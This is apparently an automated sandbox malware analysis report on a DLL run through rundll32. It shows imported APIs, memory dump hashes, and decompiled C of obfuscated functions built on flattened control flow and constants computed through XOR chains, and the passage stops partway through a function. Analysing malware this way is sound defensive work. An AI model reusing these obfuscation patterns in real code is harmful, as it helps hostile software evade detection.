                                                                                                                      • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                      • CharUpperA.USER32 ref: 10021943
                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3249967234-0
                                                                                                                      • Opcode ID: 2a3499f3841ad5e8647b8f951358b7882037f476afa2bf570201f6c7d6c9b385
                                                                                                                      • Instruction ID: ae62b421250eabce0d7e10c45050fda11272d0be93f4f0cc1201f2dd6aedebe3
                                                                                                                      • Opcode Fuzzy Hash: 2a3499f3841ad5e8647b8f951358b7882037f476afa2bf570201f6c7d6c9b385
                                                                                                                      • Instruction Fuzzy Hash: 1B41DE7990024AAFEB11DBB4DC85AFF77BCEF15355F800529F815E2192EB30A9448A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B6083 Relevance: 11.7, Strings: 9, Instructions: 413COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002B6083(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v256;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				void* _t385;
				void* _t420;
				intOrPtr _t421;
				intOrPtr _t422;
				void* _t428;
				void* _t430;
				intOrPtr _t439;
				intOrPtr _t440;
				intOrPtr _t447;
				intOrPtr _t448;
				signed int _t451;
				void* _t458;
				intOrPtr _t460;
				intOrPtr _t461;
				intOrPtr _t495;
				signed int _t502;
				signed int _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				void* _t514;
				signed int* _t516;
				void* _t520;

				_push(_a20);
				_t514 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t385);
				_v320 = 0x5bfd8;
				_t516 =  &(( &_v424)[7]);
				_v320 = _v320 ^ 0xae83e4b4;
				_v320 = _v320 + 0xffffbfdd;
				_t448 = 0;
				_v320 = _v320 ^ 0xae801261;
				_t451 = 0x4bae340;
				_v384 = 0x359b5d;
				_v384 = _v384 >> 9;
				_v384 = _v384 + 0x5a0;
				_v384 = _v384 ^ 0x40b7bf66;
				_v384 = _v384 ^ 0x40befa95;
				_v316 = 0x2933e6;
				_t502 = 0x13;
				_t504 = 0xf;
				_v316 = _v316 * 0x63;
				_v316 = _v316 ^ 0x0fe001ce;
				_v300 = 0x5708b8;
				_v300 = _v300 | 0xa16343bc;
				_v300 = _v300 ^ 0xa1786c90;
				_v308 = 0x5d4fad;
				_v308 = _v308 + 0xffffde8c;
				_v308 = _v308 ^ 0x0055ed4e;
				_v312 = 0x97068f;
				_v312 = _v312 >> 1;
				_v312 = _v312 ^ 0x0045ea4b;
				_v284 = 0xe9a634;
				_v284 = _v284 ^ 0x5bc7ef92;
				_v284 = _v284 ^ 0x5b2ed6c9;
				_v344 = 0xd52660;
				_v344 = _v344 + 0x6034;
				_v344 = _v344 >> 7;
				_v344 = _v344 ^ 0x000a9937;
				_v412 = 0x492529;
				_t55 =  &_v412; // 0x492529
				_v412 =  *_t55 * 0xa;
				_t57 =  &_v412; // 0x492529
				_v412 =  *_t57 / _t502;
				_t63 =  &_v412; // 0x492529
				_v412 =  *_t63 / _t504;
				_v412 = _v412 ^ 0x000522b4;
				_v360 = 0xff1035;
				_v360 = _v360 >> 5;
				_v360 = _v360 << 5;
				_v360 = _v360 ^ 0x00f6febc;
				_v352 = 0x24acbd;
				_v352 = _v352 >> 0xc;
				_v352 = _v352 * 0x36;
				_v352 = _v352 ^ 0x000a49b8;
				_v404 = 0x5e8a96;
				_v404 = _v404 >> 1;
				_v404 = _v404 / _t502;
				_v404 = _v404 + 0xffff7de4;
				_v404 = _v404 ^ 0x00019221;
				_v372 = 0xa45532;
				_v372 = _v372 + 0xffff1c48;
				_v372 = _v372 + 0xffffe0f0;
				_t505 = 0x6c;
				_v372 = _v372 * 0x6c;
				_v372 = _v372 ^ 0x44ea3f2c;
				_v380 = 0xf56085;
				_v380 = _v380 / _t505;
				_t506 = 0xd;
				_v380 = _v380 / _t506;
				_v380 = _v380 << 0xe;
				_v380 = _v380 ^ 0x0b2ea957;
				_v328 = 0x46776f;
				_v328 = _v328 + 0x15ec;
				_t507 = 0x1c;
				_v328 = _v328 * 0x5e;
				_v328 = _v328 ^ 0x19ebcb1f;
				_v388 = 0xfbc23f;
				_v388 = _v388 | 0xf6357e00;
				_v388 = _v388 + 0x8932;
				_v388 = _v388 ^ 0xf4ea365f;
				_v388 = _v388 ^ 0x03ea209f;
				_v336 = 0x730db6;
				_v336 = _v336 * 0x5b;
				_v336 = _v336 | 0x6492896b;
				_v336 = _v336 ^ 0x6cf77a3a;
				_v340 = 0x166b3b;
				_v340 = _v340 | 0x8c211161;
				_v340 = _v340 ^ 0x8c378fd9;
				_v396 = 0x9d5a93;
				_v396 = _v396 / _t507;
				_v396 = _v396 ^ 0xba861a50;
				_v396 = _v396 + 0xffff5b99;
				_v396 = _v396 ^ 0xba80e2b9;
				_v420 = 0x409c68;
				_t508 = 0x31;
				_v420 = _v420 / _t508;
				_v420 = _v420 >> 8;
				_t509 = 5;
				_v420 = _v420 * 0x16;
				_v420 = _v420 ^ 0x00013fee;
				_v296 = 0xc785e1;
				_v296 = _v296 ^ 0x791e03db;
				_v296 = _v296 ^ 0x79d79a97;
				_v364 = 0xad0976;
				_v364 = _v364 | 0x8850e8a8;
				_v364 = _v364 << 1;
				_v364 = _v364 ^ 0x11fb25d1;
				_v368 = 0x704a10;
				_v368 = _v368 + 0xffff0d6b;
				_v368 = _v368 << 2;
				_v368 = _v368 ^ 0x01b3e76e;
				_v288 = 0x54d2f6;
				_v288 = _v288 / _t509;
				_v288 = _v288 ^ 0x001edf05;
				_v392 = 0x949bbb;
				_v392 = _v392 + 0xbb88;
				_v392 = _v392 | 0xb3cb4dcc;
				_v392 = _v392 * 0x45;
				_v392 = _v392 ^ 0x7b348758;
				_v416 = 0x643691;
				_v416 = _v416 >> 9;
				_v416 = _v416 + 0xffff74a1;
				_t510 = 0x4e;
				_v416 = _v416 / _t510;
				_v416 = _v416 ^ 0x03464fba;
				_v356 = 0xeb775b;
				_v356 = _v356 + 0xdb8c;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 ^ 0x0001ede4;
				_v304 = 0xc1e7b5;
				_v304 = _v304 + 0xf3ef;
				_v304 = _v304 ^ 0x00c2397a;
				_v376 = 0xa68bc9;
				_t511 = 0x43;
				_v376 = _v376 / _t511;
				_v376 = _v376 >> 8;
				_v376 = _v376 ^ 0x3383f04e;
				_v376 = _v376 ^ 0x3381e4d6;
				_v408 = 0x4d9cfa;
				_t512 = 0x46;
				_t503 = _v340;
				_v408 = _v408 * 0x6f;
				_v408 = _v408 + 0x3c4a;
				_v408 = _v408 << 2;
				_v408 = _v408 ^ 0x869e5b7f;
				_v324 = 0x71360b;
				_v324 = _v324 * 0xc;
				_v324 = _v324 ^ 0x901d1633;
				_v324 = _v324 ^ 0x9559eaf9;
				_v292 = 0x9a124c;
				_v292 = _v292 + 0x530b;
				_v292 = _v292 ^ 0x0097d0f0;
				_v424 = 0x6705b6;
				_v424 = _v424 ^ 0xd04d23dd;
				_v424 = _v424 << 4;
				_v424 = _v424 >> 0xa;
				_v424 = _v424 ^ 0x000c33e5;
				_v348 = 0x1e9503;
				_v348 = _v348 >> 3;
				_v348 = _v348 ^ 0x290fe667;
				_v348 = _v348 ^ 0x2908b2d4;
				_v400 = 0xb348f5;
				_v400 = _v400 ^ 0x711fc93f;
				_v400 = _v400 << 8;
				_v400 = _v400 * 0x58;
				_v400 = _v400 ^ 0x4c97e764;
				_v332 = 0xe64092;
				_t513 = _v340;
				_v332 = _v332 / _t512;
				_v332 = _v332 + 0x1e96;
				_v332 = _v332 ^ 0x00036ca6;
				while(1) {
					L1:
					_t420 = 0xee6d0ab;
					do {
						while(1) {
							L2:
							_t520 = _t451 - 0x77439d8;
							if(_t520 > 0) {
								break;
							}
							if(_t520 == 0) {
								E002B68DE(_v420, _v296, _v364, _v368, _v264);
								_t516 =  &(_t516[3]);
								_t451 = 0x2f9aadd;
								while(1) {
									L1:
									_t420 = 0xee6d0ab;
									goto L2;
								}
							} else {
								if(_t451 == 0x195d899) {
									_t460 =  *0x2d5214; // 0x0
									_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0x3c)) + 0x58));
									 *((intOrPtr*)(_t460 + 0x38)) =  *((intOrPtr*)(_t460 + 0x38)) + 1;
									_t495 =  *((intOrPtr*)(_t460 + 0x38));
									 *((intOrPtr*)(_t460 + 0x3c)) = _t439;
									if(_t439 == 0) {
										 *((intOrPtr*)(_t460 + 0x3c)) =  *((intOrPtr*)(_t460 + 4));
									}
									_t440 =  *0x2d5214; // 0x0
									if(_t495 >=  *((intOrPtr*)(_t440 + 0x44))) {
										_t461 =  *0x2d5214; // 0x0
										 *(_t461 + 0x38) =  *(_t461 + 0x38) & 0x00000000;
									} else {
										_t451 = 0x4bae340;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								} else {
									if(_t451 == 0x2f9aadd) {
										E002B68DE(_v288, _v392, _v416, _v356, _v280);
										E002B68DE(_v304, _v376, _v408, _v324, _t513);
										E002B68DE(_v292, _v424, _v348, _v400, _v272);
										_t516 =  &(_t516[9]);
										_t451 = _t503;
										L33:
										_t420 = 0xee6d0ab;
										goto L34;
									} else {
										if(_t451 == 0x4bae340) {
											_t513 = 0;
											E002D1310(0x100,  &_v256, _v320, _v384, _v316, _v300);
											_v272 = _v272 & 0;
											_t516 =  &(_t516[4]);
											_v268 = _v268 & 0;
											_t451 = 0xce40172;
											_v280 = _v280 & 0;
											_v276 = _v276 & 0;
											while(1) {
												L1:
												_t420 = 0xee6d0ab;
												goto L2;
											}
										} else {
											if(_t451 != 0x55bcf65) {
												goto L34;
											} else {
												if(_v276 >= _v332) {
													_t447 = E002C6864( &_v280,  &_v272);
												} else {
													_t447 = E002C2753( &_v280);
												}
												_t513 = _t447;
												_t420 = 0xee6d0ab;
												_t451 =  !=  ? 0xee6d0ab : 0x2f9aadd;
												continue;
											}
										}
									}
								}
							}
							L37:
							return _t448;
						}
						if(_t451 == 0xa3ea571) {
							_t421 =  *0x2d5214; // 0x0
							_t422 =  *0x2d5214; // 0x0
							_t428 = E002C7BCA(( *(_t421 + 0x3c))[0x28] & 0x0000ffff,  &_v256,  *( *(_t421 + 0x3c)) & 0x0000ffff, _v372, _v380, _v328, _t513,  &_v272,  &_v264, _v388,  *((intOrPtr*)(_t422 + 0x3c)) + 0x20, _v336);
							_t516 =  &(_t516[0xa]);
							if(_t428 == 0) {
								_t503 = 0x195d899;
								_t451 = 0x2f9aadd;
								goto L33;
							} else {
								_t451 = 0xcddb738;
								goto L1;
							}
						} else {
							if(_t451 == 0xcddb738) {
								if(E002BBD0F( &_v264, _v340, _t514, _v396) == 0) {
									_t503 = 0x195d899;
								} else {
									_t503 = 0x1fe0da0;
									_t448 = 1;
								}
								_t451 = 0x77439d8;
								while(1) {
									L1:
									_t420 = 0xee6d0ab;
									goto L2;
								}
							} else {
								if(_t451 == 0xce40172) {
									_t430 = E002B1F9B(_a20,  &_v280, _v308, _v312, _v284, _v344, _a8);
									_t516 =  &(_t516[5]);
									if(_t430 != 0) {
										_t451 = 0x55bcf65;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								} else {
									if(_t451 != _t420) {
										goto L34;
									} else {
										_push(E002BEF71(1, 0x40));
										_push(_v404);
										_push( &_v256);
										_t458 = 0xb;
										E002B5A07(_t458, _v352);
										_t516 =  &(_t516[5]);
										_t451 = 0xa3ea571;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								}
							}
						}
						goto L37;
						L34:
					} while (_t451 != 0x1fe0da0);
					goto L37;
				}
			}











































































                                                                                                                      0x002b608d
                                                                                                                      0x002b6094
                                                                                                                      0x002b6096
                                                                                                                      0x002b609d
                                                                                                                      0x002b60a4
                                                                                                                      0x002b60ab
                                                                                                                      0x002b60b2
                                                                                                                      0x002b60b3
                                                                                                                      0x002b60b4
                                                                                                                      0x002b60b9
                                                                                                                      0x002b60c4
                                                                                                                      0x002b60c7
                                                                                                                      0x002b60d1
                                                                                                                      0x002b60d9
                                                                                                                      0x002b60db
                                                                                                                      0x002b60e3
                                                                                                                      0x002b60e8
                                                                                                                      0x002b60f0
                                                                                                                      0x002b60f5
                                                                                                                      0x002b60fd
                                                                                                                      0x002b6105
                                                                                                                      0x002b610d
                                                                                                                      0x002b611c
                                                                                                                      0x002b611f
                                                                                                                      0x002b6120
                                                                                                                      0x002b6124
                                                                                                                      0x002b612c
                                                                                                                      0x002b6137
                                                                                                                      0x002b6142
                                                                                                                      0x002b614d
                                                                                                                      0x002b6158
                                                                                                                      0x002b6163
                                                                                                                      0x002b616e
                                                                                                                      0x002b6179
                                                                                                                      0x002b6180
                                                                                                                      0x002b618b
                                                                                                                      0x002b6196
                                                                                                                      0x002b61a1
                                                                                                                      0x002b61ac
                                                                                                                      0x002b61b4
                                                                                                                      0x002b61bc
                                                                                                                      0x002b61c1
                                                                                                                      0x002b61c9
                                                                                                                      0x002b61d1
                                                                                                                      0x002b61d6
                                                                                                                      0x002b61da
                                                                                                                      0x002b61e2
                                                                                                                      0x002b61e6
                                                                                                                      0x002b61ee
                                                                                                                      0x002b61f2
                                                                                                                      0x002b61fa
                                                                                                                      0x002b6202
                                                                                                                      0x002b6207
                                                                                                                      0x002b620c
                                                                                                                      0x002b6214
                                                                                                                      0x002b621c
                                                                                                                      0x002b6226
                                                                                                                      0x002b622a
                                                                                                                      0x002b6232
                                                                                                                      0x002b623a
                                                                                                                      0x002b6244
                                                                                                                      0x002b6248
                                                                                                                      0x002b6250
                                                                                                                      0x002b6258
                                                                                                                      0x002b6260
                                                                                                                      0x002b6268
                                                                                                                      0x002b6279
                                                                                                                      0x002b627c
                                                                                                                      0x002b6280
                                                                                                                      0x002b6288
                                                                                                                      0x002b6298
                                                                                                                      0x002b62a0
                                                                                                                      0x002b62a5
                                                                                                                      0x002b62ab
                                                                                                                      0x002b62b0
                                                                                                                      0x002b62b8
                                                                                                                      0x002b62c0
                                                                                                                      0x002b62cd
                                                                                                                      0x002b62d0
                                                                                                                      0x002b62d4
                                                                                                                      0x002b62dc
                                                                                                                      0x002b62e4
                                                                                                                      0x002b62ec
                                                                                                                      0x002b62f4
                                                                                                                      0x002b62fc
                                                                                                                      0x002b6304
                                                                                                                      0x002b6311
                                                                                                                      0x002b6315
                                                                                                                      0x002b631d
                                                                                                                      0x002b6325
                                                                                                                      0x002b632d
                                                                                                                      0x002b6335
                                                                                                                      0x002b633d
                                                                                                                      0x002b634d
                                                                                                                      0x002b6351
                                                                                                                      0x002b6359
                                                                                                                      0x002b6361
                                                                                                                      0x002b6369
                                                                                                                      0x002b6375
                                                                                                                      0x002b637a
                                                                                                                      0x002b6380
                                                                                                                      0x002b638a
                                                                                                                      0x002b638b
                                                                                                                      0x002b638f
                                                                                                                      0x002b6397
                                                                                                                      0x002b63a2
                                                                                                                      0x002b63ad
                                                                                                                      0x002b63b8
                                                                                                                      0x002b63c0
                                                                                                                      0x002b63c8
                                                                                                                      0x002b63cc
                                                                                                                      0x002b63d4
                                                                                                                      0x002b63dc
                                                                                                                      0x002b63e4
                                                                                                                      0x002b63e9
                                                                                                                      0x002b63f1
                                                                                                                      0x002b6405
                                                                                                                      0x002b640c
                                                                                                                      0x002b6417
                                                                                                                      0x002b641f
                                                                                                                      0x002b6427
                                                                                                                      0x002b6434
                                                                                                                      0x002b6438
                                                                                                                      0x002b6442
                                                                                                                      0x002b644a
                                                                                                                      0x002b644f
                                                                                                                      0x002b645d
                                                                                                                      0x002b6462
                                                                                                                      0x002b6468
                                                                                                                      0x002b6470
                                                                                                                      0x002b6478
                                                                                                                      0x002b6480
                                                                                                                      0x002b6485
                                                                                                                      0x002b648d
                                                                                                                      0x002b6498
                                                                                                                      0x002b64a3
                                                                                                                      0x002b64ae
                                                                                                                      0x002b64ba
                                                                                                                      0x002b64bf
                                                                                                                      0x002b64c5
                                                                                                                      0x002b64ca
                                                                                                                      0x002b64d2
                                                                                                                      0x002b64da
                                                                                                                      0x002b64e7
                                                                                                                      0x002b64e8
                                                                                                                      0x002b64ec
                                                                                                                      0x002b64f0
                                                                                                                      0x002b64f8
                                                                                                                      0x002b64fd
                                                                                                                      0x002b6505
                                                                                                                      0x002b6512
                                                                                                                      0x002b6516
                                                                                                                      0x002b651e
                                                                                                                      0x002b6526
                                                                                                                      0x002b6531
                                                                                                                      0x002b653c
                                                                                                                      0x002b6547
                                                                                                                      0x002b654f
                                                                                                                      0x002b6557
                                                                                                                      0x002b655c
                                                                                                                      0x002b6561
                                                                                                                      0x002b6569
                                                                                                                      0x002b6571
                                                                                                                      0x002b6576
                                                                                                                      0x002b657e
                                                                                                                      0x002b6586
                                                                                                                      0x002b658e
                                                                                                                      0x002b6596
                                                                                                                      0x002b65a0
                                                                                                                      0x002b65a4
                                                                                                                      0x002b65ac
                                                                                                                      0x002b65ba
                                                                                                                      0x002b65be
                                                                                                                      0x002b65c2
                                                                                                                      0x002b65ca
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d7
                                                                                                                      0x002b65d7
                                                                                                                      0x002b65d7
                                                                                                                      0x002b65d7
                                                                                                                      0x002b65dd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b65e3
                                                                                                                      0x002b675c
                                                                                                                      0x002b6761
                                                                                                                      0x002b6764
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65e9
                                                                                                                      0x002b65ef
                                                                                                                      0x002b670b
                                                                                                                      0x002b6714
                                                                                                                      0x002b6717
                                                                                                                      0x002b671a
                                                                                                                      0x002b671d
                                                                                                                      0x002b6722
                                                                                                                      0x002b6727
                                                                                                                      0x002b6727
                                                                                                                      0x002b672a
                                                                                                                      0x002b6732
                                                                                                                      0x002b68c7
                                                                                                                      0x002b68cd
                                                                                                                      0x002b6738
                                                                                                                      0x002b6738
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65f5
                                                                                                                      0x002b65fb
                                                                                                                      0x002b66be
                                                                                                                      0x002b66da
                                                                                                                      0x002b66fc
                                                                                                                      0x002b6701
                                                                                                                      0x002b6704
                                                                                                                      0x002b68b4
                                                                                                                      0x002b68b4
                                                                                                                      0x00000000
                                                                                                                      0x002b6601
                                                                                                                      0x002b6607
                                                                                                                      0x002b6669
                                                                                                                      0x002b6676
                                                                                                                      0x002b667b
                                                                                                                      0x002b6682
                                                                                                                      0x002b6685
                                                                                                                      0x002b668c
                                                                                                                      0x002b6691
                                                                                                                      0x002b6698
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b6609
                                                                                                                      0x002b660f
                                                                                                                      0x00000000
                                                                                                                      0x002b6615
                                                                                                                      0x002b6627
                                                                                                                      0x002b6637
                                                                                                                      0x002b6629
                                                                                                                      0x002b6629
                                                                                                                      0x002b6629
                                                                                                                      0x002b663c
                                                                                                                      0x002b6645
                                                                                                                      0x002b664a
                                                                                                                      0x00000000
                                                                                                                      0x002b664a
                                                                                                                      0x002b660f
                                                                                                                      0x002b6607
                                                                                                                      0x002b65fb
                                                                                                                      0x002b65ef
                                                                                                                      0x002b68d4
                                                                                                                      0x002b68dd
                                                                                                                      0x002b68dd
                                                                                                                      0x002b6774
                                                                                                                      0x002b684d
                                                                                                                      0x002b685c
                                                                                                                      0x002b6894
                                                                                                                      0x002b6899
                                                                                                                      0x002b689e
                                                                                                                      0x002b68aa
                                                                                                                      0x002b68af
                                                                                                                      0x00000000
                                                                                                                      0x002b68a0
                                                                                                                      0x002b68a0
                                                                                                                      0x00000000
                                                                                                                      0x002b68a0
                                                                                                                      0x002b677a
                                                                                                                      0x002b6780
                                                                                                                      0x002b682e
                                                                                                                      0x002b683a
                                                                                                                      0x002b6830
                                                                                                                      0x002b6832
                                                                                                                      0x002b6837
                                                                                                                      0x002b6837
                                                                                                                      0x002b683f
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b6786
                                                                                                                      0x002b678c
                                                                                                                      0x002b67fb
                                                                                                                      0x002b6800
                                                                                                                      0x002b6805
                                                                                                                      0x002b680b
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b678e
                                                                                                                      0x002b6790
                                                                                                                      0x00000000
                                                                                                                      0x002b6796
                                                                                                                      0x002b67a7
                                                                                                                      0x002b67a8
                                                                                                                      0x002b67b7
                                                                                                                      0x002b67ba
                                                                                                                      0x002b67bb
                                                                                                                      0x002b67c0
                                                                                                                      0x002b67c3
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x00000000
                                                                                                                      0x002b65d2
                                                                                                                      0x002b65d2
                                                                                                                      0x002b6790
                                                                                                                      0x002b678c
                                                                                                                      0x002b6780
                                                                                                                      0x00000000
                                                                                                                      0x002b68b9
                                                                                                                      0x002b68b9
                                                                                                                      0x00000000
                                                                                                                      0x002b68c5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )%I$,?D$4`$J<$KE$NU$[w$owF$3)
                                                                                                                      • API String ID: 0-2094660596
                                                                                                                      • Opcode ID: 4cd56e8a9fadaf15ec37961597618454d2a50db531e880c693318dc49c86f587
                                                                                                                      • Instruction ID: e89a1bf2f5eb1b754e3f1d10224de60e7c6c114e7b55b9f9d9f3c8419433e81f
                                                                                                                      • Opcode Fuzzy Hash: 4cd56e8a9fadaf15ec37961597618454d2a50db531e880c693318dc49c86f587
                                                                                                                      • Instruction Fuzzy Hash: DB225371518381DFD364CF25C48AA9BBBF2FBC4758F10890DF68A8A260C7B58959CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CACD3 Relevance: 11.6, Strings: 9, Instructions: 313COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002CACD3(intOrPtr* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t358;
				void* _t359;
				intOrPtr _t360;
				void* _t366;
				void* _t375;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t426;
				intOrPtr _t430;
				signed int* _t431;

				_t431 =  &_v160;
				_t426 = __ecx;
				_v12 = __ecx;
				_v8 = 0x8c571a;
				_t430 = 0;
				_t375 = 0x79707ab;
				_v4 = 0;
				_v64 = 0xfc5ff;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x00003f17;
				_v140 = 0x873397;
				_v140 = _v140 * 0x50;
				_v140 = _v140 << 5;
				_v140 = _v140 << 4;
				_v140 = _v140 ^ 0x803e6000;
				_v112 = 0x5cc448;
				_v112 = _v112 | 0xb5fdf5b7;
				_v112 = _v112 >> 9;
				_v112 = _v112 ^ 0x005afefa;
				_v60 = 0x19d054;
				_t378 = 0x29;
				_v60 = _v60 / _t378;
				_v60 = _v60 ^ 0x0000a12d;
				_v40 = 0x4c7c9b;
				_t379 = 0x7b;
				_v40 = _v40 / _t379;
				_v40 = _v40 ^ 0x00009f31;
				_v88 = 0xb88e01;
				_v88 = _v88 << 8;
				_v88 = _v88 | 0xb280bd16;
				_v88 = _v88 ^ 0xba886110;
				_v80 = 0xf71efc;
				_v80 = _v80 << 9;
				_t380 = 0x34;
				_v80 = _v80 / _t380;
				_v80 = _v80 ^ 0x04950844;
				_v96 = 0xf5fda;
				_v96 = _v96 >> 7;
				_t381 = 0x11;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x00041aa2;
				_v156 = 0x96c5de;
				_v156 = _v156 / _t381;
				_v156 = _v156 ^ 0x88ccdc31;
				_v156 = _v156 * 0x3d;
				_v156 = _v156 ^ 0x96be8a04;
				_v72 = 0x71396c;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x367e7763;
				_v72 = _v72 ^ 0xf298a4dc;
				_v148 = 0xd59d39;
				_v148 = _v148 >> 6;
				_v148 = _v148 + 0xffff0863;
				_v148 = _v148 << 4;
				_v148 = _v148 ^ 0x0020b4d1;
				_v116 = 0x4e2a72;
				_v116 = _v116 ^ 0x41f61916;
				_t382 = 0x66;
				_v116 = _v116 / _t382;
				_v116 = _v116 ^ 0xb72c0337;
				_v116 = _v116 ^ 0xb7828c59;
				_v28 = 0x7f34ff;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0xfe6bca43;
				_v124 = 0x9f58a2;
				_v124 = _v124 + 0xffff9c37;
				_v124 = _v124 + 0x725a;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x4fb1837f;
				_v52 = 0xa9f0c8;
				_v52 = _v52 + 0xfffffc3c;
				_v52 = _v52 ^ 0x00ad5534;
				_v24 = 0xa43c6e;
				_t383 = 0x6e;
				_v24 = _v24 * 0x5b;
				_v24 = _v24 ^ 0x3a644c1a;
				_v132 = 0x7fb628;
				_v132 = _v132 * 0xb;
				_v132 = _v132 << 6;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x9dcf3d61;
				_v100 = 0x597f63;
				_v100 = _v100 | 0xd4d51309;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xbafad16c;
				_v108 = 0x4d061a;
				_v108 = _v108 >> 2;
				_v108 = _v108 ^ 0xd197d397;
				_v108 = _v108 + 0xffff042d;
